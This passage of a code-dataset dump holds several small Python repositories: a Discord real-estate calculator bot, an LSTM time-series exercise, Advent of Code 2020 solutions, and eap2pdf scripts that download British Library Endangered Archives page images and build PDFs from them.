ctx.send('**__Investment Calculations__**')\n\tawait ctx.send('**Net Operating Income** : *${:,d}*'.format(round(rent-monthlyExpenses)))\n\tawait ctx.send('**Cash on Cash Return** : *{:.3f}%*'.format(100*(((rent*12)-(monthlyExpenses*12))/((value*downPayment)+(value*closingCost)))))\n\tawait ctx.send('**Cap Rate** : *{:.3f}%*'.format(100*(((rent*12)-(monthlyExpenses*12))/value)))\n\tawait ctx.send('\\u200B')\n\t\n\n\n\n\n\nbot.run(TOKEN)\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.7395833134651184, "avg_line_length": 18.399999618530273, "blob_id": "7fd4a35ff48e44c32d3d9f3347de839bec5bf95a", "content_id": "7bc8247509de80f74a704e09da5a9630120e6573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 96, "license_type": "no_license", "max_line_length": 40, "num_lines": 5, "path": "/requirements.txt", "repo_name": "RyanNDao/Public-RE-Bot", "src_encoding": "UTF-8", "text": "git+https://github.com/Rapptz/discord.py\nasync-timeout==3.0.1\ndnspython==1.16.0\n\npymongo~=3.11.0" } ]
2
edvanjr/aula_lstm
https://github.com/edvanjr/aula_lstm
e532864dc8c4646e3a86b4bc881c449cf02bd96b
7e01373402f3a8f1015009e90c146eaa8c4ee523
12e2c086df447e19529c0986876b95673e9b6396
refs/heads/master
2020-05-14T06:12:21.532523
2019-04-16T14:23:57
2019-04-16T14:23:57
181,705,074
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6194865107536316, "alphanum_fraction": 0.6431863307952881, "avg_line_length": 26.14285659790039, "blob_id": "983dcbb7220dcb6c2e0d71361ea88561e3bc76ab", "content_id": "0d430674bcc8a471c1a817e98ec67878749d6d54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1519, "license_type": "no_license", "max_line_length": 79, "num_lines": 56, "path": "/aula_lstm.py", "repo_name": "edvanjr/aula_lstm", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 16 10:40:26 2019\n\n@author: Edvan Soares\n\"\"\"\n\nimport numpy as np\nfrom pandas import read_csv\nfrom keras.models import Sequential\nfrom keras.layers import LSTM\nfrom keras.layers import Dense\n\ndef split_sequence(sequence, n_steps):\n\tX, y = list(), list()\n\tfor i in range(len(sequence)):\n\t\tend_ix = i + n_steps\n\t\tif end_ix > len(sequence)-1:\n\t\t\tbreak\n\t\tseq_x, seq_y = sequence[i:end_ix], sequence[end_ix]\n\t\tX.append(seq_x)\n\t\ty.append(seq_y)\n\treturn np.array(X), np.array(y)\n\ndef split_train_test_data(X, y, n_test):\n return X[:-n_test], y[:-n_test], X[-n_test:], y[-n_test:]\n\ndef mape(y_true, y_pred):\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n return round(np.mean(np.abs((y_true - y_pred) / y_true)) * 100, 2)\n\ndef fit_model_lstm(X, y):\n model = Sequential()\n model.add(LSTM(100, activation='relu', input_shape=(n_steps, n_features)))\n model.add(Dense(1))\n model.compile(optimizer='adam', loss='mse')\n model.fit(X, y, epochs=2000, verbose=0)\n return model\n\ndata = read_csv(open('data.csv', 'r'), sep='\\t', header=0).values.T.tolist()[0]\n\nn_steps = 3\nn_features = 1\nX, y = split_sequence(data, n_steps)\nX = X.reshape((X.shape[0], X.shape[1], n_features))\nX_train, y_train, X_test, y_test = split_train_test_data(X, y, 6)\n\nmodel = fit_model_lstm(X_train, y_train)\npredicted = []\n\nfor x in X_test:\n test = x.reshape((1, n_steps, n_features))\n yhat = model.predict(test, verbose=0)\n predicted.append(yhat)\n\nprint(mape(y_test, predicted))" } ]
1
wszlosek/Advent-Of-Code-2020
https://github.com/wszlosek/Advent-Of-Code-2020
a5b2eea044d8f0811f58e0d87544d96dd41f77b3
fc54f5daa371d8c400303637d7edbe4e9c91dfbc
152f0fce7fea68334265df7b48c185682c62cb82
refs/heads/main
2023-02-02T08:35:53.584487
2020-12-22T15:40:58
2020-12-22T15:40:58
320,402,298
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.4275229275226593, "alphanum_fraction": 0.4532110095024109, "avg_line_length": 20, "blob_id": "ca87bd15e5ad8f2e0aec178bbbdd96aef6aff1e4", "content_id": "abfc79e4016ccd0f2cd5a4993c627970f71bf0ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 545, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/Day 1/day1.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines):\n for a in lines:\n for b in lines:\n if (int(a) + int(b) == 2020):\n return (int(a) * int(b))\n\n\ndef part2(lines):\n for a in lines:\n for b in lines:\n for c in lines:\n if(int(a) + int(b) + int(c) == 2020):\n return (int(a) * int(b) * int(c))\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().splitlines()\n\n\n print(f\"Part 1: {part1(lines)}\")\n print(f\"Part 2: {part2(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.406862735748291, "alphanum_fraction": 0.4346405267715454, "avg_line_length": 18.44444465637207, "blob_id": "9c5fe4d33a361bc9ea542023c4c9f56b6e0527a8", "content_id": "c4ac94072852e3e066aa70afcc23849019191b49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1224, "license_type": "no_license", "max_line_length": 51, "num_lines": 63, "path": "/Day 5/day5.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def bin(line, length, left, right, par1, par2):\n low = 0\n high = length\n i = 0\n\n while i < len(line):\n mid = (high + low) // 2\n\n if line[i] == left:\n high = mid - 1\n\n elif line[i] == right:\n low = mid + 1\n\n elif (line[i] != par1 and line[i] != par2):\n break\n\n i += 1\n\n return mid + 1\n\ndef part1(lines):\n id = 0\n\n for l in lines:\n row = bin(l, 127, 'F', 'B', 'L', 'R')\n column = bin(l, 7, 'L', 'R', 'F', 'B')\n if(row * 8 + column > id):\n id = row * 8 + column\n\n return id\n\n\ndef part2(lines):\n data = []\n out = []\n\n for l in lines:\n row = bin(l, 127, 'F', 'B', 'L', 'R')\n column = bin(l, 7, 'L', 'R', 'F', 'B')\n id = 8 * row + column\n data.append(id)\n\n allSeat = set(range(min(data), max(data)))\n\n for i in allSeat:\n if not(i in data):\n out.append(i)\n\n for i in range(0, len(out)-1):\n if(out[i] + 8 != out[i+1]):\n return out[i+1]\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n print(f\"Part 1: {part1(lines)}\")\n print(f\"Part 2: {part2(lines)}\")\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4433249235153198, "alphanum_fraction": 0.45759865641593933, "avg_line_length": 17.060606002807617, "blob_id": "f7aee5cc42e7369d7f234d1bdf3320ba7519cd87", "content_id": "23f3ea6d3de04e8057edb5c9e8cb4c37cdf52ea4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1191, "license_type": "no_license", "max_line_length": 57, "num_lines": 66, "path": "/Day 6/day6.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def commonCharacters(strings, n):\n MAX_CHAR = 26\n prim = [True] * MAX_CHAR\n l = 0\n\n for i in range(n):\n sec = [False] * MAX_CHAR\n\n for j in range(len(strings[i])):\n if (prim[ord(strings[i][j]) - ord('a')]):\n sec[ord(strings[i][j]) - ord('a')] = True\n\n for i in range(MAX_CHAR):\n prim[i] = sec[i]\n\n for i in range(26):\n if (prim[i]):\n l += 1\n\n return l\n\n\ndef part1(sentences):\n sum = 0\n\n for i in sentences:\n sum += len(i)\n\n return sum\n\n\ndef part2(lines):\n arr = []\n p2 = 0\n\n for l in lines:\n if l != \"\":\n arr.append(l)\n else:\n p2 += commonCharacters(arr, len(arr))\n arr.clear()\n\n return p2\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().split('\\n')\n\n sentence = \"\"\n sentences = []\n\n for l in lines:\n if l != \"\":\n sentence += l\n else:\n sentence = \"\".join(set(sentence))\n sentences.append(sentence)\n sentence = \"\"\n\n print(f\"Part 1: {part1(sentences)}\")\n print(f\"Part 2: {part2(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.3485533595085144, "alphanum_fraction": 0.40189874172210693, "avg_line_length": 20.69607925415039, "blob_id": "3db873e5bea21803d1073dffdc676806317cdc79", "content_id": "3d666f6dcaac74fbd8c1d6d50af43d98f73acca7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2212, "license_type": "no_license", "max_line_length": 84, "num_lines": 102, "path": "/Day 4/day4.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def req(sentence, data):\n p = 0\n\n for d in data:\n if(sentence.count(d)):\n p += 1\n\n if(p == len(data)):\n return True\n return False\n\n\ndef findInArr(array, temp):\n for i in range(len(array)):\n if(array[i].find(temp) != -1):\n return i\n\n\ndef hcl(sentence):\n ch = ['0', '1', '2', '3', '4', '5', '6', '7', '8',\n '9', 'a', 'b', 'c', 'd', 'e', 'f']\n\n for i in sentence:\n if(not(i in ch)):\n return False\n return True\n\n\ndef ecl(sentence):\n ch = ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']\n\n if(len(sentence) == 3 and sentence in ch):\n return True\n return False\n\n\ndef part1(lines, data):\n p1 = 0\n\n for l in lines:\n if(req(l, data)):\n p1 += 1\n\n return p1\n\n\ndef part2(lines, data):\n\n p2 = 0\n for l in lines:\n o = 0\n l = l.replace('\\n', ' ')\n\n if(req(l, data)):\n sp = l.split()\n data2 = [findInArr(sp, data[0]), findInArr(sp, data[1]),\n findInArr(sp, data[2]), findInArr(sp, data[3]),\n findInArr(sp, data[4]), findInArr(sp, data[5]),\n findInArr(sp, data[6])]\n\n if(1920 <= int(sp[data2[0]][4:]) <= 2002):\n o += 1\n\n if(2010 <= int(sp[data2[1]][4:]) <= 2020):\n o += 1\n\n if (2020 <= int(sp[data2[2]][4:]) <= 2030):\n o += 1\n\n if(sp[data2[3]][-2:] == \"cm\" and 150 <= int(sp[data2[3]][4:-2]) <= 193):\n o += 1\n if (sp[data2[3]][-2:] == \"in\" and 59 <= int(sp[data2[3]][4:-2]) <= 76):\n o += 1\n\n if(sp[data2[4]][4] == \"#\" and hcl(sp[data2[4]][5:])):\n o += 1\n\n if(ecl(sp[data2[5]][4:])):\n o += 1\n\n if (len(sp[data2[6]]) == 13):\n o += 1\n\n\n if(o == 7):\n p2 += 1\n\n return p2\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().split('\\n\\n')\n\n data = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']\n \n print(f\"Part 1: {part1(lines, data)}\")\n print(f\"Part 2: {part2(lines, data)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4328824281692505, "alphanum_fraction": 0.4609781503677368, "avg_line_length": 18.632652282714844, "blob_id": "357b4b8ea20444a3e375137067f1192492f7d6cd", "content_id": "84beec717c56a542aee0a5875f87bb86c9b2180e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 961, "license_type": "no_license", "max_line_length": 64, "num_lines": 49, "path": "/Day 9/day9.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines):\n for i in range(26, len(lines)):\n hLines = lines[i-25:i]\n sums = []\n\n for l1 in range(25):\n for l2 in range(25):\n if l1 != l2:\n sums.append(int(hLines[l1])+int(hLines[l2]))\n\n if (int(lines[i]) not in sums):\n return lines[i]\n\n sums.clear()\n\n\ndef part2(lines):\n x = int(part1(lines))\n n = len(lines)\n res = int(lines[0])\n start = 0\n\n for i in range(1, n+1):\n\n while(res > x and start < i-1):\n res -= int(lines[start])\n start += 1\n\n if res == x:\n break\n\n if i < n:\n res += int(lines[i])\n\n arr = [int(lines[l]) for l in range(start, i)]\n\n return (min(arr) + max(arr))\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n print(f\"Part 1: {part1(lines)}\", end=\"\")\n print(f\"Part 2: {part2(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.3786008358001709, "alphanum_fraction": 0.4156378507614136, "avg_line_length": 17.25, "blob_id": "75440cdcdaa8cf018cc092f0b2e81c84468b83e4", "content_id": "f3664caae8a0074920325d9bacc00306405325a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "no_license", "max_line_length": 54, "num_lines": 40, "path": "/Day 2/day2.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(s, a, b, char):\n z = s[3].count(char)\n\n if(z >= a and z <= b):\n return True\n return False\n\n\ndef part2(s, a, b, char):\n if((char == s[3][a] and char != s[3][b])\n or (char != s[3][a] and char == s[3][b])):\n return True\n return False\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().splitlines()\n\n p1 = 0\n p2 = 0\n\n for l in lines:\n s = l.replace(\"-\", \" \").split(\" \")\n\n char = s[2][0]\n a = int(s[0])\n b = int(s[1])\n\n if(part1(s, a, b, char)):\n p1 += 1\n if (part2(s, a-1, b-1, char)):\n p2 += 1\n\n print(f\"Part 1: {p1}\")\n print(f\"Part 2: {p2}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.44108107686042786, "alphanum_fraction": 0.4681081175804138, "avg_line_length": 16.80769157409668, "blob_id": "3e8bbd26d88cba330afc20ff1b28761ce1c95c7b", "content_id": "5465f416d7b866f55fb7c07c4ed46b74c453f310", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 925, "license_type": "no_license", "max_line_length": 66, "num_lines": 52, "path": "/Day 7/day7.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "import re\n\ndef shinyGold(g, graph):\n if g == \"shiny gold\":\n return True\n\n elif g != \"\":\n return any(shinyGold(next, graph) for i, next in graph[g])\n\n return False\n\n\ndef part1(graph):\n p1 = 0\n\n for g in graph.keys():\n if(shinyGold(g, graph)):\n p1 += 1\n\n return p1 - 1\n\n\ndef part2(g, graph):\n if g == \"\":\n return 1\n\n return sum(int(i) * part2(next, graph)\n for i, next in graph[g]) + 1\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n graph = {}\n for l in lines:\n regex = re.match('(.+?) bags', l)\n c1 = regex.group(1)\n c2 = re.findall('(\\d+) (.+?) bag', l)\n\n if len(c2) > 0:\n graph[c1] = c2\n else:\n graph[c1] = [('0', '')]\n\n\n print(f\"Part 1: {part1(graph)}\")\n print(f\"Part 2: {part2('shiny gold', graph) - 1}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.3884514570236206, "alphanum_fraction": 0.43044620752334595, "avg_line_length": 15.234042167663574, "blob_id": "d569eefee68b3e7f5dbb80e670da4403571047dc", "content_id": "b9b384e7ef5a0d508fb91a0a244903fd8879d58e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "no_license", "max_line_length": 36, "num_lines": 47, "path": "/Day 10/day10.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines):\n o1 = 1\n o3 = 0\n\n for l in lines:\n\n if (l == lines[-1]):\n o3 += 1\n break\n\n if (l+1 in lines):\n o1 += 1\n\n elif (l+3 in lines):\n o3 += 1\n\n return (o1 * o3)\n\n\ndef part2(lines):\n lines.append(lines[-1]+3)\n sof = {0:1}\n\n for l in lines:\n sof[l] = sof.get(l-3, 0) \\\n + sof.get(l-2, 0) \\\n + sof.get(l-1, 0)\n\n\n return sof[lines[-1]]\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().split('\\n')\n\n for l in range(len(lines)):\n lines[l] = int(lines[l])\n\n lines = sorted(lines)\n\n print(f\"Part 1: {part1(lines)}\")\n print(f\"Part 2: {part2(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4121405780315399, "alphanum_fraction": 0.4329073429107666, "avg_line_length": 23.096153259277344, "blob_id": "ccc6af4473c5822d5b7e072cdb70cc0cdeca7837", "content_id": "102de211dcbc8a4167befe43e67d4a2b60cbed57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1252, "license_type": "no_license", "max_line_length": 80, "num_lines": 52, "path": "/Day 11/day11.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "from copy import deepcopy\nfrom itertools import chain\n\ndef adj(adjrows, i):\n return list(chain(*[[ x[i] for i in range(i-1, i+2) ] for x in adjrows ]))\n\n\ndef part1(lines):\n l1 = deepcopy(lines)\n d = 0\n rows = [None, ['.' for x in range(len(lines[0]))] + ['.'], lines[0] + ['.']]\n\n for j in range(len(lines)):\n rows.pop(0)\n rows.append(lines[j+1] + ['.']) \\\n if j+1 in range(len(lines)) \\\n else rows.append(['.' for i in range(len(lines[0]))] + ['.'])\n\n for i in range(len(lines[0])):\n cell = lines[j][i]\n\n if cell == \"#\":\n adjm = adj(rows, i).count('#') - 1\n if adjm > 3:\n l1[j][i] = 'L'\n d += 1\n\n elif cell == \"L\":\n adjm = adj(rows, i).count('#')\n if adjm == 0:\n l1[j][i] = '#'\n d += 1\n\n if d > 0:\n return part1(l1)\n\n return lines\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = [list(x) for x in f.read().replace('L', '#').splitlines()]\n\n count = []\n [count.append(x.count('#')) for x in part1(lines)]\n p1 = sum(count)\n\n print(f\"Part 1: {p1}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.37806639075279236, "alphanum_fraction": 0.3953824043273926, "avg_line_length": 15.139534950256348, "blob_id": "99acd9491f81d25dd5b0bf323be307eaafbcbbbb", "content_id": "849e23623ff51e0a193d3b56ed7b7874e9c9350f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 693, "license_type": "no_license", "max_line_length": 37, "num_lines": 43, "path": "/Day 8/day8.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines):\n acc = 0\n i = 0\n iS = []\n\n while True:\n instruction = lines[i][0:3]\n\n if i in iS:\n break\n else:\n iS.append(i)\n\n if lines[i][4] == \"-\":\n value = int(lines[i][4:])\n else:\n value = int(lines[i][5:])\n\n if instruction == \"acc\":\n acc += value\n i += 1\n\n elif instruction == \"jmp\":\n i += value\n\n else:\n i += 1\n\n if i >= len(lines):\n break\n\n return acc\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n print(f\"Part 1: {part1(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.770370364189148, "avg_line_length": 21.5, "blob_id": "7a08c52c28578ed48b5d7fd8a5e20c45a9cc7c57", "content_id": "dfe973fba3cd39b7fe4edcb6433838802f782c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 135, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/README.md", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "# Advent Of Code 2020\n\nSome of my puzzle solutions from Advent Of Code. \nProgramming language used: Python.\n\nhttps://adventofcode.com/\n" }, { "alpha_fraction": 0.41542288661003113, "alphanum_fraction": 0.4689054787158966, "avg_line_length": 17.720930099487305, "blob_id": "47466d2384ecd4eaf2f7ef6c66b9ce425398d272", "content_id": "60c6768eb3d95ffbd0eedaf94ed1ae6ee4701412", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 804, "license_type": "no_license", "max_line_length": 40, "num_lines": 43, "path": "/Day 3/day3.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines, lhX, lhY, right, down):\n x = 0\n y = 0\n tree = 0\n\n while y < lhY-1:\n x += right\n y += down\n\n if(x >= lhX):\n x -= lhX\n\n if(lines[y][x] == \"#\"):\n tree += 1\n\n return tree\n\n\ndef part2(lines, lhX, lhY):\n x1 = part1(lines, lhX, lhY, 1, 1)\n x2 = part1(lines, lhX, lhY, 3, 1)\n x3 = part1(lines, lhX, lhY, 5, 1)\n x4 = part1(lines, lhX, lhY, 7, 1)\n x5 = part1(lines, lhX, lhY, 1, 2)\n\n return x1 * x2 * x3 * x4 * x5\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().splitlines()\n lhX = len(str(lines[0]))\n lhY = len(lines)\n\n p1 = part1(lines, lhX, lhY, 3, 1)\n p2 = part2(lines, lhX, lhY)\n\n print(f\"Part 1: {p1}\")\n print(f\"Part 2: {p2}\")\n\n\nif __name__ == \"__main__\":\n main()" } ]
12
omshivaprakash/eap2pdf
https://github.com/omshivaprakash/eap2pdf
95dc55efebafb73af511266a7edfc820ebf0d57f
05a0258b88c50389155ce289aa6146e765272289
170c730f147e32c9dcb20af06122701eb58fa2b4
refs/heads/master
2023-03-15T12:26:57.959278
2018-08-08T05:01:35
2018-08-08T05:01:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5025419592857361, "alphanum_fraction": 0.5144890546798706, "avg_line_length": 33.20869445800781, "blob_id": "4eef3b0712d07ecff7de0ddb4ed05f4e16018324", "content_id": "b53af23e38a889c05222665e4ba0f87d7c82dde0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3934, "license_type": "permissive", "max_line_length": 108, "num_lines": 115, "path": "/eap_download_cl.py", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "import multiprocessing\nimport os\nimport sys\nimport time\nimport urllib.request\nfrom urllib.error import HTTPError\nfrom fpdf import FPDF\nimport PyPDF2\n\n\nclass EAPBookFetch:\n\n EAP_BASE_URL = 'https://images.eap.bl.uk'\n EAP_FILENAME = 'default.jpg'\n DEFAULT_HEIGHT = 1200\n DEFAULT_WIDTH = 1200 * 0.8\n JPEG_PATH = 'jpgs'\n PDF_PATH = 'pdfs'\n\n @staticmethod\n def join_url(*args):\n joined_url = ''\n for arg in args:\n joined_url = joined_url + arg + '/'\n return joined_url\n\n @staticmethod\n def set_rotate(angle):\n if angle == 90 or angle == 180 or angle == 270:\n return angle\n else:\n return 0\n\n def download_jpg(self, url):\n base_eap = url.split('/')[0]\n eap_url_for_entry = url.replace('/', '_')\n combined_url = self.join_url(self.EAP_BASE_URL, base_eap, eap_url_for_entry)\n pg = 1\n can_go = True\n file_list = []\n if not os.path.exists(self.JPEG_PATH):\n os.makedirs(self.JPEG_PATH)\n while can_go:\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.height) + ',' +\n str(self.DEFAULT_WIDTH), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n\n title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg) + '.jpg')\n pg = pg + 1\n print('Downloading ' + title)\n try:\n urllib.request.urlretrieve(dl_url, title)\n file_list.append(title)\n except HTTPError:\n can_go = False\n\n if self.type == 'p':\n pdf = FPDF(orientation=self.type, unit='pt', format=(self.DEFAULT_WIDTH + 50, self.height + 50))\n pdf.add_page(orientation=self.type)\n else:\n pdf = FPDF(orientation=self.type, unit='pt', format=(self.height + 50, self.DEFAULT_WIDTH + 50))\n pdf.add_page(orientation=self.type)\n\n for image in file_list:\n print('Adding ' + image + ' to PDF')\n if self.type == 'p':\n pdf.image(image, h=self.height, w=self.DEFAULT_WIDTH)\n else:\n pdf.image(image, h=self.height, w=self.DEFAULT_WIDTH)\n page_count = pdf.page_no()\n if not os.path.exists(self.PDF_PATH):\n os.makedirs(self.PDF_PATH)\n pdf.output(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n if page_count > len(file_list):\n # delete pg 1\n infile = PyPDF2.PdfFileReader(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n outfile = PyPDF2.PdfFileWriter()\n pg = 1\n print('Deleting blank page...')\n while pg < page_count:\n p = infile.getPage(pg)\n pg = pg + 1\n outfile.addPage(p)\n with open(os.path.join(self.PDF_PATH, eap_url_for_entry + '_nofirst.pdf'), 'wb') as f:\n outfile.write(f)\n try:\n os.remove(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n except OSError:\n pass\n\n def run(self):\n if len(sys.argv) < 2:\n raise Exception(\"No URL to download\")\n else:\n # shitty code, sorry\n if len(sys.argv) < 3:\n\n url = sys.argv[1]\n self.download_jpg(url)\n else:\n urls = []\n for arg in sys.argv:\n if arg.find(\"EAP\") != -1:\n urls.append(arg)\n pool = multiprocessing.Pool(processes=len(sys.argv) - 1)\n pool.map(self.download_jpg, urls)\n\n def __init__(self):\n self.rotation = 0\n self.height = self.DEFAULT_HEIGHT\n self.type = 'p' # probably broken for landscape\n\n\nif __name__ == '__main__':\n EAPBookFetch().run()\n" }, { "alpha_fraction": 0.5556599497795105, "alphanum_fraction": 0.5570690631866455, "avg_line_length": 38.425926208496094, "blob_id": "1261bda51903cc39acee4139c9f283db00ebe231", "content_id": "c2fc374b1be9f82b38c983b6874e19ea8848ed2b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2129, "license_type": "permissive", "max_line_length": 109, "num_lines": 54, "path": "/get_eap_entry.py", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "import re\nimport _helpers\n\n\nclass EAPFileList:\n\n COLLECTIONS_FILE = 'collections.txt'\n EAP_FILE = 'eap_files.txt'\n URL_FOR_FILE = 'https://eap.bl.uk/archive-file/'\n URL_FOR_COLL = 'https://eap.bl.uk/collection/'\n\n def get_eap_list(self):\n with open(self.COLLECTIONS_FILE) as f:\n collections = f.read().splitlines()\n return collections\n\n def generate_download_list(self, collections):\n download_list = []\n for collection in collections:\n print('Now adding files from collection ' + collection + ' to download list...')\n converted_url = self.URL_FOR_FILE + collection.replace('/', '-')\n collection_conv_url = self.URL_FOR_COLL + collection.replace('/', '-')\n coll_exists, coll_content = _helpers.page_exists(collection_conv_url)\n if not coll_exists:\n print(collection + ' is not a collection')\n else:\n try:\n search_desc = coll_content.find(\"span\", class_='search-description').get_text()\n except AttributeError:\n print('No documents found in ' + collection_conv_url)\n continue\n total_results = re.search(\".*of(.*)results.*\", search_desc.replace(',', '')).group(1).strip()\n if not _helpers.page_exists(converted_url + '-' + total_results):\n print('This collection probably has sub-collections. Please use those instead')\n else:\n for i in range(1, int(total_results) + 1):\n download_list.append(collection.replace('-', '/') + '/' + str(i))\n return download_list\n\n def write_to_file(self, eap_link):\n with open(self.EAP_FILE, 'a') as f:\n for entry in eap_link:\n f.write(entry + '\\n')\n\n def run(self):\n collections = self.get_eap_list()\n if not collections:\n print('collections.txt is empty')\n else:\n self.write_to_file(self.generate_download_list(collections))\n\n\nif __name__ == '__main__':\n EAPFileList().run()\n" }, { "alpha_fraction": 0.6957295536994934, "alphanum_fraction": 0.7384341359138489, "avg_line_length": 36.53333282470703, "blob_id": "0ea7d1a4115845b0385d917767fc5fc9e04f503f", "content_id": "99053c11ce86c332c4142c03da0507a85eeecc9e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 562, "license_type": "permissive", "max_line_length": 76, "num_lines": 15, "path": "/eap_conf.ini", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "[wiki]\nusername = YourUsernameHere\npwd = YourPasswordHere\nsummary = Uploaded via EAP2PDF\ntitle = Title to be shown in Commons page\nfilename = Actual filename of the document (without namespace or extension)\ndesc = Description\nauthor = Author name - can be {{Creator|}} template\ndate = Date of publication\nlicense = Licenses in form of template - e.g. {{PD-India}}{{PD-1923}}\n\n[download]\nurl = EAP number - e.g. EAP262/1/1/5\nrotation = Rotation of images - valid values are 0, 90, 180 and 270\nheight = Height in px of images in integer - in general 1200 is a good value" }, { "alpha_fraction": 0.7637185454368591, "alphanum_fraction": 0.7695287466049194, "avg_line_length": 54.32143020629883, "blob_id": "626c77cdbbd065d3d42d626068bd35f617983389", "content_id": "714da7c8cb02fe53626b8acb1d7091f5b7012537", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1549, "license_type": "permissive", "max_line_length": 159, "num_lines": 28, "path": "/README.md", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "# eap2pdf\nConverts books from EAP (eap.bl.uk) to PDF\n\n# Scripts\nThis repository has 2 scripts - one for mass downloading, the other for individual downloading and uploading to Wikimedia Commons.\n\n# Installation\n- Python 3.6\n- Clone repo\n- pip install -r requirements.txt \n\n# Mass downloader\n\n- The recommended mass downloader is **eap_download_mass.py**\n- To use this, at first, all collections containing books you want to download must be added to collections.txt\n- Format for collections - EAPabc/x/y. Ensure that you're adding collections (note the URL) and not archive file or projects\n- Run *python3 get_eap_entry.py*. This is required only for the **first run**. This generates eap_files.txt.\n- Now run *python3 eap_download_mass.py*. Optionally add a limit of number of books to be downloaded as an argument (defaults to 50)\n- This should download all PDFs to the /pdf folder. This also generates eap_done.txt which is used to keep track of files you've already downloaded\n- The alternative file *eap_download_cl.py* allows more customization (i.e. rotation, orientation), but requires a command line input of files to be downloaded\n\n# Individual book uploader\n\n- The file for this is 